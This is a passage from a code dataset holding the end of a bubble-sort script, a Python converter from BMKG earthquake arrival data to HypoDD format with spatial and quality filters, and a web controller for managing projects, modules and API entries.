"__main__":\n    \n    arr = [6,3,5,2,8,4,1]\n    no_swaps = bubble_sort(arr)\n    print(arr, no_swaps)","sub_path":"Sorting/bubbleSort-CountSwaps CTCI.py","file_name":"bubbleSort-CountSwaps CTCI.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"590049889","text":"import os\nimport pickle\nfrom eQ_rw import q_filter, map_area\nfrom bmkg_rw import ReadBMKG\nfrom hypodd_rw import WriteHypoDD\nfrom datetime import datetime as dt\nfrom check_outliers import check_outliers\n\n\"\"\"\n===========================================\nearthquake catalog converter by @eqhalauwet\n===========================================\n\nPython script to convert BMKG arrival data to HypoDD format.\n\nWritten by eQ Halauwet, BMKG-PGR IX Ambon.\nyehezkiel.halauwet@bmkg.go.id\n\n\nNotes:\n\n1. It reads BMKG arrival data using \"ReadBMKG\", then converts it to HypoDD format.\n2. Data can be filtered by area and by quality parameters (gap, rms, min phase, etc.).\n3. Output is in HypoDD phase format (P & S phases), plus an additional catalog list and arrival file.\n\nLogs:\n\n2018-Sep: Added filter option.\n2020-May: Changed file input type from obj to list, so that it can import from several files.\n2020-May: Added phase filter routine\n\n\"\"\"\n# fileinput = ['D:/BMKG/Katalog/Arrival PGN/list_detail_2008.txt',\n#              'D:/BMKG/Katalog/Arrival PGN/list_detail_2009.txt',\n#              'D:/BMKG/Katalog/Arrival PGN/list_detail_2010.txt',\n#              'D:/BMKG/Katalog/Arrival PGN/list_detail_2011.txt',\n#              'D:/BMKG/Katalog/Arrival PGN/list_detail_2012.txt',\n#              'D:/BMKG/Katalog/Arrival PGN/list_detail_2013.txt',\n#              'D:/BMKG/Katalog/Arrival PGN/list_detail_2014.txt',\n#              'D:/BMKG/Katalog/Arrival PGN/list_detail_2015.txt',\n#              'D:/BMKG/Katalog/Arrival PGN/list_detail_2016.txt',\n#              'D:/BMKG/Katalog/Arrival PGN/list_detail_2017.txt',\n#              'D:/BMKG/Katalog/Arrival PGN/list_detail_2018.txt',\n#              'D:/BMKG/Katalog/Arrival PGN/list_detail_2019.txt']\n# fileinput = ['list_detail2.txt']\n# bmkgdata, ids = ReadBMKG(fileinput)\n# save_dic = True  # Save filtered dictionary or not?\n\nif not os.path.exists('output'):\n    os.makedirs('output')\nif not os.path.exists('dict_data'):\n    os.makedirs('dict_data')\n\nout_root = 'output'\noutput = os.path.join(out_root, 'phase.dat')\noutput_arr = os.path.join(out_root, 'arrival.dat')\noutput_cat = os.path.join(out_root, 'catalog.dat')\nout_log = os.path.join(out_root, 'log.txt')\nout_geo = os.path.join(out_root, 'sts_geometry.dat')\nout_dic = os.path.join('dict_data', 'Maluku_2008-2019.pkl')\n\npkl_file = open(out_dic, \"rb\")\nbmkgdata = pickle.load(pkl_file)\nids = '__earthquake data converter by eQ Halauwet__\n\n'\nsave_dic = False  # True/False\n\n# FILTER PARAMETERS\n# Temporal and spatial filters\nmin_time = dt(2009, 1, 1)  # (year, month, day)\nmax_time = dt(2019, 12, 31)  # (year, month, day)\nulat = -2.5\nblat = -4.5\nllon = 127\nrlon = 130.5\nmax_depth = 60\n\n# Data quality filters: limits on max azimuth_gap & rms_residual, min phases per event, and max sensor distance (degrees)\nrem_fixd = False\nmax_rms = 2\nmax_gap = 360\nmax_spatial_err = 100\nmode = 'manual'\n\n# Phase filter\nlst_phase = ['AAI', 'AAII', 'KRAI', 'MSAI', 'BNDI', 'BANI', 'NLAI', 'BSMI', 'OBMI']\nmin_P = 6\nmin_S = 0\n\nfilt_dic = {'min_tim': min_time,\n            'max_tim': max_time,\n            'area': {'top': ulat,\n                     'bot': blat,\n                     'left': llon,\n                     'right': rlon\n                     },\n            'max_dep': max_depth,\n            'rm_fixd': rem_fixd,\n            'max_rms': max_rms,\n            'max_gap': max_gap,\n            'max_err': max_spatial_err,\n            'mode': mode,\n            'phase': {'lst_pha':
lst_phase,\n 'min_P': min_P,\n 'min_S': min_S}\n }\n\nfiltered_data = q_filter(bmkgdata, filt_dic, inptype='BMKG', prob_flag=False)\n\nWriteHypoDD(inp=filtered_data, area=filt_dic['area'], out=output, out_arr=output_arr,\n out_cat=output_cat, out_geom=out_geo, out_log=out_log)\n\nmap_area(filt_dic['area'], out_dir=out_root)\n\ncheck_outliers(arrival_file=output_arr, out_dir=out_root, std_error=4, plot_flag=False)\n\nif save_dic:\n nldic = open(out_dic, 'wb')\n pickle.dump(filtered_data, nldic)\n nldic.close()\n","sub_path":"bmkg2hypodd.py","file_name":"bmkg2hypodd.py","file_ext":"py","file_size_in_byte":3992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"11246281","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n__author__ = 'DangGaofeng'\n\nfrom controllers.Base import Base\nfrom config.config import PAGE_LENGTH\nimport json\n\nservice = Base()\nproje = service.getPrjectService()\nmodel = service.getModelService()\napi = service.getApiService()\n#---------------project action----------------#\ndef project():\n\tparams = service.get_params()\n\tpg = int(params.get(\"page\", 1))\n\tpl = PAGE_LENGTH\n\tdata = {}\n\tdata[\"menu\"] = \"manage\"\n\tdata[\"sub_menu\"] = \"manage_project\"\n\tdata[\"pg\"] = pg\n\tdata[\"pl\"] = pl\n\tret = proje.list_all(pg, pl)\n\tdata[\"count\"], data[\"lists\"] = 0, []\n\tif ret != -1:\n\t\tdata[\"count\"], data[\"lists\"] = ret\n\treturn service.render('manage/project.html', data=data)\ndef project_get():\n\tparams = service.get_params()\n\tret = proje.get_byid(int(params[\"id\"]))\n\tret_dict = {}\n\tif len(ret) > 0:\n\t\tret_dict[\"id\"] = ret[0][0]\n\t\tret_dict[\"name\"] = ret[0][1]\n\t\tret_dict[\"desc\"] = ret[0][2]\n\treturn json.dumps(ret_dict)\ndef project_add():\n\tparams = service.get_params()\n\tret = proje.add(params[\"name\"], params[\"desc\"])\n\treturn str(ret)\ndef project_edit():\n\tparams = service.get_params()\n\tret = proje.update_byid(int(params[\"id\"]), params[\"name\"], params[\"desc\"])\n\treturn str(ret)\ndef project_delete():\n\tparams = service.get_params()\n\tret = proje.delete_byid(int(params[\"id\"]))\n\treturn str(ret)\n#-------------------model action-------------------#\ndef models():\n\tparams = service.get_params()\n\tpg = int(params.get(\"page\", 1))\n\tname = params.get(\"name\", \"\")\n\tpl = PAGE_LENGTH\n\tpid = int(params.get(\"pid\", 0))\n\tdata = {}\n\tdata[\"menu\"] = \"manage\"\n\tdata[\"sub_menu\"] = \"manage_models\"\n\tdata[\"pg\"] = pg\n\tdata[\"pl\"] = pl\n\tdata[\"PAGER\"] = \"pid=\"+str(pid)\n\tdata[\"pid\"] = pid\n\tret = model.list_fuzzy(parent_id=pid, mod_name=name, pagenow=pg, pagesize=pl)\n\tdata[\"count\"], data[\"lists\"] = 0, []\n\tif ret != -1:\n\t\tdata[\"count\"], data[\"lists\"] = ret\n\tdata[\"project_list\"] = service.getProjectList()\n\treturn service.render('manage/modules.html', data=data)\ndef model_add():\n\tparams = service.get_params()\n\tproject_id = int(params[\"project_id\"])\n\tname = params['name']\n\tdesc = params['desc']\n\tret = model.add(project_id, name, desc)\n\treturn str(ret)\ndef model_get():\n\tparams = service.get_params()\n\tret = model.get_byid(int(params[\"id\"]))\n\tret_dict = {}\n\tif ret!=-1 and len(ret) > 0:\n\t\tret_dict[\"id\"] = ret[0][0]\n\t\tret_dict[\"pid\"] = ret[0][1]\n\t\tret_dict[\"name\"] = ret[0][2]\n\t\tret_dict[\"desc\"] = ret[0][3]\n\treturn json.dumps(ret_dict)\ndef model_edit():\n\tparams = service.get_params()\n\tret = model.update_byid(int(params[\"id\"]), int(params[\"project_id\"]), 
params[\"name\"], params[\"desc\"])\n\treturn str(ret)\ndef model_delete():\n\tparams = service.get_params()\n\tret = model.delete_byid(int(params[\"id\"]))\n\treturn str(ret)\n#-------------------api action----------------#\ndef apis():\n\tparams = service.get_params()\n\tpg = int(params.get(\"page\", 1))\n\tpl = PAGE_LENGTH\n\tpid = int(params.get(\"pid\", 0))\n\tmid = int(params.get(\"mid\", 0))\n\tname = params.get(\"name\", \"\")\n\tdata = {}\n\tdata[\"menu\"] = \"manage\"\n\tdata[\"sub_menu\"] = \"manage_api\"\n\tdata[\"pg\"] = pg\n\tdata[\"pl\"] = pl\n\tdata[\"PAGER\"] = \"pid=\"+str(pid)+\"&mid=\"+str(mid)\n\tdata[\"pid\"] = pid\n\tdata[\"mid\"] = mid\n\tdata[\"project_list\"] = service.getProjectList()\n\tdata[\"model_list\"] = service.getModelList(pid)\n\tret = api.list_fuzzy(parent_id=mid, intf_name=name, pagenow=pg, pagesize=pl)\n\tdata[\"count\"], data[\"lists\"] = 0, []\n\tif ret != -1:\n\t\tdata[\"count\"], data[\"lists\"] = ret\n\treturn service.render('manage/api.html', data=data)\ndef api_get():\n\tparams = service.get_params()\n\tret = api.get_byid(int(params[\"id\"]))\n\tret_dict = {}\n\tif len(ret) > 0:\n\t\tret_dict[\"id\"] = ret[0][0]\n\t\tret_dict[\"mid\"] = ret[0][2]\n\t\tret_dict[\"name\"] = ret[0][1]\n\t\tret_dict[\"method\"] = ret[0][3]\n\t\tret_dict[\"url\"] = ret[0][6]\n\t\tret_dict[\"desc\"] = ret[0][4]\n\t\tret_dict[\"wiki\"] = ret[0][5]\n\treturn json.dumps(ret_dict)\ndef api_add():\n\tparams = service.get_params()\n\tmid = int(params.get(\"model_id\", 0))\n\tmethod = params.get(\"method\", \"GET\")\n\tname = params.get(\"name\", \"\")\n\turl = params.get(\"url\", \"\")\n\twiki = params.get(\"wiki\", \"\")\n\tdesc = params.get(\"desc\", \"\")\n\tret = api.add(mid, name, method, url, desc, wiki)\n\treturn str(ret)\ndef api_edit():\n\tparams = service.get_params()\n\tid = int(params.get(\"id\", 0))\n\tmid = int(params.get(\"model_id\", 0))\n\tmethod = params.get(\"method\", \"GET\")\n\tname = params.get(\"name\", \"\")\n\turl = params.get(\"url\", \"\")\n\twiki = params.get(\"wiki\", \"\")\n\tdesc = params.get(\"desc\", \"\")\n\tret = api.update_byid(id, mid, name, method, url, desc, wiki)\n\treturn str(ret)\ndef api_delete():\n\tparams = service.get_params()\n\tret = api.delete_byid(int(params[\"id\"]))\n\treturn str(ret)\n\n#--------------helper methods----------------------#\n\ndef ajaxGetModelList():\n\tparams = service.get_params()\n\tpid = int(params.get(\"pid\", 0))\n\treturn json.dumps(service.getModelList(pid))\n\n#----------------add new code above this line------------------\nfunctions = {\n\t\"project\": project,\n\t\"project_get\": project_get,\n\t\"project_add\": project_add,\n\t\"project_edit\": project_edit,\n\t\"project_delete\": project_delete,\n\t\"models\": models,\n\t\"model_get\": model_get,\n\t\"model_add\": model_add,\n\t\"model_edit\": model_edit,\n\t\"model_delete\": model_delete,\n\t\"api\": apis,\n\t\"api_get\": api_get,\n\t\"api_add\": api_add,\n\t\"api_edit\": api_edit,\n\t\"api_delete\": api_delete,\n\t\"getModelByPid\": ajaxGetModelList\n}\ndef page(action=\"\"):\n\tif action not in functions:\n\t\treturn service.render('base_page/404.html', code=404)\n\treturn functions[action]()","sub_path":"controllers/Manage.py","file_name":"Manage.py","file_ext":"py","file_size_in_byte":5417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}